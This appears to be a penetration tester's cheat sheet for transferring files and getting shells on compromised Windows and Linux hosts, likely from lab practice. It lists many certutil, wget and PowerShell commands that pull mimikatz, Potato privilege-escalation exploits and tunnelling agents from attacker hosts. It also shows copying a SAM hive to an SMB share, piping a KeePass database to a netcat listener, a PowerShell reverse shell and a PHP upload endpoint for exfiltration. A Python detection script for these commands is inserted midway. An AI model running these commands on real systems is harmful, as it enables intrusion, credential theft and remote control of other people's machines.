File Transfers & Shells

Note: if access is denied when transferring files, Windows Defender or another antivirus may be running. Either that or there is some kind of permissions restriction.

Certutil

If PowerShell isn't available (I have had more success with file transfers using PS):

certutil -urlcache -split -f http://192.168.49.93:1337/Windows/winPEASx64.exe winpeas.exe
certutil -urlcache -split -f http://192.168.49.93:1337/Windows/mimikatz.exe mimikatz.exe
certutil -urlcache -split -f http://192.168.45.225:1337/Windows/nc.exe nc.exe
certutil -urlcache -split -f http://192.168.45.231:1337/Windows/JuicyPotato.exe JuicyPotato.exe
certutil -urlcache -split -f http://192.168.45.225:1337/Windows/powercat.ps1 powercat.ps1
certutil -urlcache -split -f http://192.168.49.93:1337/Windows/GodPotato-NET4.exe GodPotato-NET4.exe
certutil -urlcache -split -f http://192.168.45.159:1337/Windows/SigmaPotato.exe SigmaPotato.exe
certutil -urlcache -split -f http://192.168.49.53:1337/Windows/adPEAS.ps1 adPEAS.ps1
certutil -urlcache -split -f http://192.168.45.191:1337/Windows/chisel.exe chisel.exe
certutil -urlcache -split -f http://192.168.49.53:1337/Windows/PrivescCheck.ps1 privesccheck.ps1
certutil -urlcache -split -f http://192.168.45.215:1337/Windows/powerup.ps1 powerup.ps1
certutil -urlcache -split -f http://10.10.14.12:1337/Windows/Certify/Certify.exe certify.exe
certutil -urlcache -split -f http://192.168.49.93:1337/Windows/PowerView.ps1 powerview.ps1
certutil -urlcache -split -f http://10.150.71.20:1337/Windows/ListDlls/Listdlls64.exe ListDLLs.exe 

Wget

wget http://192.168.45.159:1337/Windows/winPEASx64.exe -o winpeas.exe
wget http://10.8.0.2:1337/Windows/winpeas.ps1 -o winpeas.ps1
wget http://10.8.0.2:1337/Windows/mimikatz.exe -o mimikatz.exe
wget http://192.168.49.53:1337/Windows/Procmon64.exe -o Procmon64.exe
wget http://10.8.0.2:1337/Windows/Invoke-Mimikatz.ps1 -o Invoke-Mimikatz.ps1
wget http://192.168.49.93:1337/Windows/nc.exe -o nc.exe
wget http://192.168.45.247:1337/Windows/socatx64.exe -o socatx64.exe
wget http://192.168.45.239:1337/Windows/chisel.exe -o chisel.exe
wget http://192.168.45.241:1337/Windows/FullPowers.exe -o FullPowers.exe
wget http://192.168.49.53:1337/Windows/Seatbelt.exe -o Seatbelt.exe
wget http://10.8.0.2:1337/Windows/GodPotato-NET4.exe -O GodPotato-NET4.exe
wget http://192.168.45.247:1337/Windows/RoguePotato.exe -O RoguePotato.exe
wget http://192.168.45.225:1337/Windows/PrintSpoofer64.exe -O PrintSpoofer64.exe
wget http://192.168.45.247:1337/Windows/SigmaPotato.exe -O SigmaPotato.exe
wget http://192.168.45.247:1234/Windows/pingsweep.ps1 -O pingsweep.ps1
wget http://192.168.45.247:1337/Windows/Procmon64a.exe -o Procmon64a.exe
wget http://192.168.45.247:1337/Windows/Procmon.exe -o Procmon.exe
wget http://192.168.45.247:1337/Windows/Procmon64.exe -o Procmon64.exe
wget http://192.168.45.247:1337/Windows/exploit.ps1 -o exploit.ps1
wget http://192.168.45.247:1337/Windows/exploit.exe -o exploit.exe
wget http://192.168.45.247:1337/Windows/function.ps1 -o function.ps1

Enumeration scripts

wget http://192.168.45.215:1337/Windows/powerup.ps1 -o powerup.ps1
wget http://192.168.45.229:1337/Windows/PrivescCheck.ps1 -o privesccheck.ps1
wget http://192.168.45.196:1337/Windows/beRoot.exe -o beroot.exe
wget http://10.10.11.51:1337/Windows/PowerView.ps1 -o powerview.ps1
wget http://192.168.49.53:1337/Windows/SharpHound.ps1 -o sharphound.ps1
wget http://192.168.49.53:1337/Windows/SharpHound.exe -o sharphound.exe
wget http://10.8.0.2:1337/Windows/PSTools/PsExec.exe -o PsExec.exe
wget http://10.8.0.2:1337/Windows/RawCopy/RawCopy64.exe -o RawCopy64.exe
wget http://192.168.45.196:1337/Windows/SharpGPOAbuse.zip -o sharpgpoabuse.zip
wget http://192.168.45.196:1337/Windows/SharpGPOAbuse.exe -o sharpgpoabuse.exe

Ligolo proxy (Windows)

wget http://192.168.49.93:1337/Windows/proxy -o proxy.exe

Ligolo agent (Linux)

wget http://192.168.49.93:1337/Linux/agent -O agent

Ligolo agent (Windows)

wget http://192.168.49.93:1337/Windows/agent2.exe -o agent2.exe

Ligolo proxy (Linux)

wget http://192.168.45.174:1337/Linux/proxy2 -O proxy2

PowerShell

(new-object System.Net.WebClient).DownloadFile('http://192.168.119.138:1337/Windows/chisel.exe','C:\Windows\Temp\chisel.exe')

IWR

Invoke-WebRequest -Uri http://10.10.93.141:1337/Windows/winPEASx64.exe -OutFile winpeas.exe
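
Added example (not part of the original notes): a defender-side check that flags the certutil, wget/IWR and WebClient download commands listed above in process command-line logs. The rule names, the `classify`/`scan` helpers and the sample lines are constructed for illustration.

```python
import re

# Rules for the download methods listed above, applied to process command lines
# (for example Sysmon Event ID 1 or Security 4688 with command-line auditing).
RULES = [
    ("certutil_urlcache",
     re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I)),
    ("webclient_download",
     re.compile(r"net\.webclient\b.*\.download(file|string)\s*\(", re.I)),
    ("iwr_outfile",
     re.compile(r"\b(invoke-webrequest|iwr|wget)\b.*\bhttps?://.*\s-o(utfile)?\b", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
PORT_RE = re.compile(r"https?://[^/\s:]+:(\d+)", re.I)
TOOL_EXT = (".exe", ".ps1", ".dll", ".zip")

def classify(cmdline):
    """Return a finding dict for a download command line, or None."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            url = URL_RE.search(cmdline)
            url = url.group(0) if url else ""
            port = PORT_RE.match(url)
            return {
                "rule": name,
                "url": url,
                "tool_ext": url.lower().endswith(TOOL_EXT),
                "odd_port": bool(port) and port.group(1) not in ("80", "443"),
            }
    return None

# Constructed sample command lines (192.0.2.0/24 is a documentation range).
SAMPLE = [
    "certutil -urlcache -split -f http://192.0.2.10:1337/Windows/tool.exe tool.exe",
    "powershell (new-object System.Net.WebClient).DownloadFile('http://192.0.2.10:1337/a.ps1','C:\\Windows\\Temp\\a.ps1')",
    "powershell Invoke-WebRequest -Uri http://192.0.2.10/report.txt -OutFile report.txt",
    "certutil -hashfile C:\\Users\\alice\\setup.exe SHA256",
]

def scan(lines):
    """Return (line, finding) pairs for every line that matches a rule."""
    return [(l, f) for l in lines if (f := classify(l))]

if __name__ == "__main__":
    for line, finding in scan(SAMPLE):
        print(finding["rule"], finding["url"], finding)
```

The `tool_ext` and `odd_port` fields are triage hints only; certutil fetching any URL is unusual enough on most hosts to review regardless of either.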

Impacket-Smbserver

Use copy or xcopy. Lots of targets' policies will require a username and password for mounting a share.

impacket-smbserver -smb2support -user user -password pass shared .
net use Z: \\192.168.45.225\shared /user:user pass
New-PSDrive -Name "SharedFolder" -PSProvider "FileSystem" -Root "\\<ip>\<folder_name>"
cd SharedFolder:
Copy-Item -Path "SAM.hive" -Destination "Z:\"   

nc.exe

This is a really great, less complex alternative to the SMB server if you cannot mount the SMB share for one reason or another.

root@kali:~# nc -lnvp 4444 > CEH.kdbx
C:\Users\Administrator\.jenkins\nc.exe 10.10.14.5 4444 < CEH.kdbx

PowerShell revshell

wget http://192.168.45.218:1337/Linux/Invoke-PowerShellTcp.ps1 -o Invoke-PowerShellTcp.ps1
echo "Invoke-PowerShellTcp -Reverse -IpAddress <IP> -Port <PORT>" >> Invoke-PowerShellTcp.ps1

powershell -c

PHP Shell File Upload Using Apache

cat upload.php
chmod +x upload.php
<?php
$uploaddir = '/var/www/uploads/';

$uploadfile = $uploaddir . $_FILES['file']['name'];

move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
sudo mkdir /var/www/uploads
mv upload.php /var/www/uploads
service apache2 start
ps -ef | grep apache
powershell (New-Object System.Net.WebClient).UploadFile('http://<your Kali ip>/upload.php', '<file you want to transfer>')
service apache2 stop